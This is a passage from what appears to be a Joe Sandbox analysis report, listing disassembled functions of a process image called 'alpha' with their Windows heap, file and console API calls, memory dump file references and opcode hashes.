                              • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                              • Instruction ID: d84e1edd602eaed27db92315a5a72bc0c733a42f5e8210dc0cf595f96dac1b90
                              • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                              • Instruction Fuzzy Hash: BF619132A08B42CAE720EF6295842ADB7B4FB84744F984235DE5D476EDDF38D450D710
                              Function 00007FF744F0B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B6D0
                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B6E7
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B701
                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B715
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocSize
                              • String ID:
                              • API String ID: 2549470565-0
                              • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                              • Instruction ID: a0039b3f844da02ea21d110a4223fd014ecda3acfcc89b42d01985dbd3b2f43f
                              • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                              • Instruction Fuzzy Hash: 68210035A1D682C6EB14BF56E584078E6A1FB89B80BCC9431DE4E037D8DF3CE845A720
                              Function 00007FF744F059E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F11EA0: wcschr.MSVCRT(?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF744F30D54), ref: 00007FF744F11EB3
                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F05A2E
                              • _open_osfhandle.MSVCRT ref: 00007FF744F05A4F
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F237AA
                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF744F237D2
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                              • String ID:
                              • API String ID: 22757656-0
                              • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                              • Instruction ID: 2a3f475f99d42162fd99df2ee7e47390c9242faa73e4b6e5540696890243e9d4
                              • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                              • Instruction Fuzzy Hash: 7F116371A1C645C7E750BF25E488339BAA0F789B65F984734DA29073D4CF3CD4459B10
                              Function 00007FF744F25690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF744F25433,?,?,?,00007FF744F269B8,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F256C5
                              • RtlFreeHeap.NTDLL ref: 00007FF744F256D9
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF744F25433,?,?,?,00007FF744F269B8,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F256FD
                              • RtlFreeHeap.NTDLL ref: 00007FF744F25711
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$FreeProcess
                              • String ID:
                              • API String ID: 3859560861-0
                              • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                              • Instruction ID: 5c301ef1b82d7876ed0f3de2d9e79e51c8f448fa5e753a7230d3f8e30c32a0cb
                              • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                              • Instruction Fuzzy Hash: CD112872A08B81C7DB00AF56E4440A8BBA0F749F84B8C8125DF4E03758DF38E456C750
                              Function 00007FF744F19158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                              • Instruction ID: 2ed8f7bbb37a25f7f48e55c1dfb1ce8d1e8a61015825f1e474352e434e02242b
                              • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                              • Instruction Fuzzy Hash: D1219F3591DB45C6E740BF06E884369B3A4FB88754F980035DE8D827A8DF7DE498D720
                              Function 00007FF744F14AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AD6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AEF
                                • Part of subcall function 00007FF744F14A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                                • Part of subcall function 00007FF744F14A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                                • Part of subcall function 00007FF744F14A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                                • Part of subcall function 00007FF744F14A14: memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                                • Part of subcall function 00007FF744F14A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F1EE64
                              • RtlFreeHeap.NTDLL ref: 00007FF744F1EE78
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                              • String ID:
                              • API String ID: 2759988882-0
                              • Opcode ID: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
                              • Instruction ID: a7cd730335a9e1d8cd85dc8112b3214e626cc75a11854ab703b50a76f498d01b
                              • Opcode Fuzzy Hash: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
                              • Instruction Fuzzy Hash: F4F0EC61A1DA42C7EB14BF679495178E9E1EF8EB41B8D9434CD4E42398EE3CA8449720
                              Function 00007FF744F2F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleMode_get_osfhandle
                              • String ID:
                              • API String ID: 1606018815-0
                              • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                              • Instruction ID: c5d180bd216bad9aeaa30a082b070fd1a3834689181c2c8ec9a601c070538841
                              • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                              • Instruction Fuzzy Hash: DDF0A235529A42CBD744BF11E484179FA60FB8AB42F889274DE4B063D8DF3CD5159B50
                              Function 00007FF744F0CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleTitle
                              • String ID: -
                              • API String ID: 3358957663-3695764949
                              • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                              • Instruction ID: 567dedb37c6608fa6e958bb3e1a5ad27161864cc832405e11b426251e5b89662
                              • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                              • Instruction Fuzzy Hash: C6317021A0D682C6EB14BF13A884078E6A4EB89B90F9D5135DE0E077D9EF7CE441E724
                              Function 00007FF744F17280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpswscanf
                              • String ID: :EOF
                              • API String ID: 1534968528-551370653
                              • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                              • Instruction ID: 709e72f1f92fa5520eb781d0d50f0901aa146010d9a7f47e8bddd848ed210a76
                              • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                              • Instruction Fuzzy Hash: 99314C31A1CA46C6FB54BF57A8802B8F2E0EF55B50FCC5131EE4E462D9DF2CE841A660
                              Function 00007FF744F0B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3$3
                              • API String ID: 0-2538865259
                              • Opcode ID: 20d97ca64ded1831fc5a14ddeeed34ee126ef41525fd7b4cb26341839782f1e3
                              • Instruction ID: b878e8c913dfdab1e5b9da9fad28db2f53291041632704d93e68aa4948094ca9
                              • Opcode Fuzzy Hash: 20d97ca64ded1831fc5a14ddeeed34ee126ef41525fd7b4cb26341839782f1e3
                              • Instruction Fuzzy Hash: CB01F371D5E582CAF314BFA298C8674B660BBA4311FDC5135CE0E015E9DF3C7894A661
                              Function 00007FF744F106C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                              • Instruction ID: 59fb5f7045792851bd5c14d8019b9b2b3f6aff530c963de63aa67d58d01e9bf9
                              • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                              • Instruction Fuzzy Hash: 8A412772A0D652CAEB15BF12E484579B7B0EB85B90F989035DE4D07BD8DF3CA840E760